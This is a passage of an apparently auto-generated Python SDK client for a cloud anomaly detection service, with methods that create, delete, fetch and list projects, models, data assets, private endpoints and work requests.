            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def create_project(self, create_project_details, **kwargs):
    """Create a new Project (POST /projects).

    :param create_project_details: request body describing the project.
    :param kwargs: optional ``retry_strategy``, ``opc_retry_token``, ``opc_request_id``.
    :return: response whose data is deserialized as ``Project``.
    :raises ValueError: for unrecognized kwargs.
    """
    resource_path = "/projects"
    method = "POST"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_retry_token",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_project got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_project_details,
        response_type="Project")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
    """Delete an AI private endpoint (DELETE /aiPrivateEndpoints/{aiPrivateEndpointId}).

    :param ai_private_endpoint_id: identifier of the endpoint; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``if_match``, ``opc_request_id``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
    method = "DELETE"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "if_match",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_ai_private_endpoint got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "aiPrivateEndpointId": ai_private_endpoint_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_data_asset(self, data_asset_id, **kwargs):
    """Delete a DataAsset (DELETE /dataAssets/{dataAssetId}).

    :param data_asset_id: identifier of the data asset; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``if_match``, ``opc_request_id``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/dataAssets/{dataAssetId}"
    method = "DELETE"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "if_match",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_data_asset got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "dataAssetId": data_asset_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_model(self, model_id, **kwargs):
    """Delete a Model (DELETE /models/{modelId}).

    :param model_id: identifier of the model; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``if_match``, ``opc_request_id``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/models/{modelId}"
    method = "DELETE"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "if_match",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_model got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "modelId": model_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def delete_project(self, project_id, **kwargs):
    """Delete a Project (DELETE /projects/{projectId}).

    :param project_id: identifier of the project; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``if_match``, ``opc_request_id``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/projects/{projectId}"
    method = "DELETE"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "if_match",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_project got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "projectId": project_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def detect_anomalies(self, detect_anomalies_details, **kwargs):
    """Run anomaly detection against a trained model (POST /actions/detectAnomalies).

    :param detect_anomalies_details: request body with the data to score.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``, ``if_match``,
        ``opc_retry_token``.
    :return: response whose data is deserialized as ``AnomalyDetectResult``.
    :raises ValueError: for unrecognized kwargs.
    """
    resource_path = "/actions/detectAnomalies"
    method = "POST"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "if_match",
        "opc_retry_token"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "detect_anomalies got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=detect_anomalies_details,
        response_type="AnomalyDetectResult")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
    """Fetch an AI private endpoint (GET /aiPrivateEndpoints/{aiPrivateEndpointId}).

    :param ai_private_endpoint_id: identifier of the endpoint; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``.
    :return: response whose data is deserialized as ``AiPrivateEndpoint``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_ai_private_endpoint got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "aiPrivateEndpointId": ai_private_endpoint_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="AiPrivateEndpoint")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_data_asset(self, data_asset_id, **kwargs):
    """Fetch a DataAsset (GET /dataAssets/{dataAssetId}).

    :param data_asset_id: identifier of the data asset; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``.
    :return: response whose data is deserialized as ``DataAsset``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/dataAssets/{dataAssetId}"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_data_asset got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "dataAssetId": data_asset_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="DataAsset")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_model(self, model_id, **kwargs):
    """Fetch a Model (GET /models/{modelId}).

    :param model_id: identifier of the model; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``.
    :return: response whose data is deserialized as ``Model``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/models/{modelId}"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_model got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "modelId": model_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="Model")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_project(self, project_id, **kwargs):
    """Fetch a Project (GET /projects/{projectId}).

    :param project_id: identifier of the project; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``.
    :return: response whose data is deserialized as ``Project``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/projects/{projectId}"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_project got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "projectId": project_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="Project")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def get_work_request(self, work_request_id, **kwargs):
    """Fetch a work request (GET /workRequests/{workRequestId}).

    :param work_request_id: identifier of the work request; must be non-empty.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``.
    :return: response whose data is deserialized as ``WorkRequest``.
    :raises ValueError: for unrecognized kwargs or an empty/None path parameter.
    """
    resource_path = "/workRequests/{workRequestId}"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "get_work_request got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "workRequestId": work_request_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    # Every path segment must be a usable, non-blank value.
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="WorkRequest")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_ai_private_endpoints(self, compartment_id, **kwargs):
    """List AI private endpoints in a compartment (GET /aiPrivateEndpoints).

    :param compartment_id: compartment to list in (required query parameter).
    :param kwargs: optional ``retry_strategy``, ``lifecycle_state``,
        ``display_name``, ``id``, ``limit``, ``page``, ``sort_order``,
        ``sort_by``, ``opc_request_id``.
    :return: response whose data is deserialized as ``AiPrivateEndpointCollection``.
    :raises ValueError: for unrecognized kwargs or invalid enum values.
    """
    resource_path = "/aiPrivateEndpoints"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "lifecycle_state",
        "display_name",
        "id",
        "limit",
        "page",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "list_ai_private_endpoints got unknown kwargs: {!r}".format(unknown))

    # Enum-valued filters are validated client side before the request is sent.
    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["CREATING", "UPDATING", "ACTIVE", "DELETING", "DELETED", "FAILED"]
        if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
            raise ValueError(
                "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
            )
    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["timeCreated", "displayName"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    query_params = {
        "compartmentId": compartment_id,
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "displayName": kwargs.get("display_name", missing),
        "id": kwargs.get("id", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="AiPrivateEndpointCollection")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_data_assets(self, compartment_id, **kwargs):
    """List DataAssets in a compartment (GET /dataAssets).

    :param compartment_id: compartment to list in (required query parameter).
    :param kwargs: optional ``retry_strategy``, ``project_id``, ``display_name``,
        ``limit``, ``page``, ``lifecycle_state``, ``sort_order``, ``sort_by``,
        ``opc_request_id``.
    :return: response whose data is deserialized as ``DataAssetCollection``.
    :raises ValueError: for unrecognized kwargs or invalid enum values.
    """
    resource_path = "/dataAssets"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "project_id",
        "display_name",
        "limit",
        "page",
        "lifecycle_state",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "list_data_assets got unknown kwargs: {!r}".format(unknown))

    # Enum-valued filters are validated client side before the request is sent.
    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["ACTIVE", "DELETED"]
        if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
            raise ValueError(
                "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
            )
    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["timeCreated", "displayName"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    query_params = {
        "compartmentId": compartment_id,
        "projectId": kwargs.get("project_id", missing),
        "displayName": kwargs.get("display_name", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="DataAssetCollection")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_models(self, compartment_id, **kwargs):
    """List Models in a compartment (GET /models).

    :param compartment_id: compartment to list in (required query parameter).
    :param kwargs: optional ``retry_strategy``, ``project_id``, ``lifecycle_state``,
        ``display_name``, ``limit``, ``page``, ``sort_order``, ``sort_by``,
        ``opc_request_id``.
    :return: response whose data is deserialized as ``ModelCollection``.
    :raises ValueError: for unrecognized kwargs or invalid enum values.
    """
    resource_path = "/models"
    method = "GET"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "project_id",
        "lifecycle_state",
        "display_name",
        "limit",
        "page",
        "sort_order",
        "sort_by",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "list_models got unknown kwargs: {!r}".format(unknown))

    # Enum-valued filters are validated client side before the request is sent.
    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"]
        if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
            raise ValueError(
                "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
            )
    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["timeCreated", "displayName"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    query_params = {
        "compartmentId": compartment_id,
        "projectId": kwargs.get("project_id", missing),
        "lifecycleState": kwargs.get("lifecycle_state", missing),
        "displayName": kwargs.get("display_name", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ModelCollection")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
    def list_projects(self, compartment_id, **kwargs):
        """List projects in a compartment, returning a ``ProjectCollection``.

        :param str compartment_id: (required) OCID of the compartment to query.
        :param kwargs: optional ``lifecycle_state``, ``display_name``, ``limit``,
            ``page``, ``sort_order``, ``sort_by``, ``opc_request_id`` and a
            per-call ``retry_strategy``.
        :return: result of ``base_client.call_api`` with response type
            ``ProjectCollection``.
        :raises ValueError: on unknown kwargs or invalid enum values.
        """
        resource_path = "/projects"
        method = "GET"
        # Reject any keyword argument that is not part of this operation.
        expected_kwargs = [
            "retry_strategy",
            "lifecycle_state",
            "display_name",
            "limit",
            "page",
            "sort_order",
            "sort_by",
            "opc_request_id"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
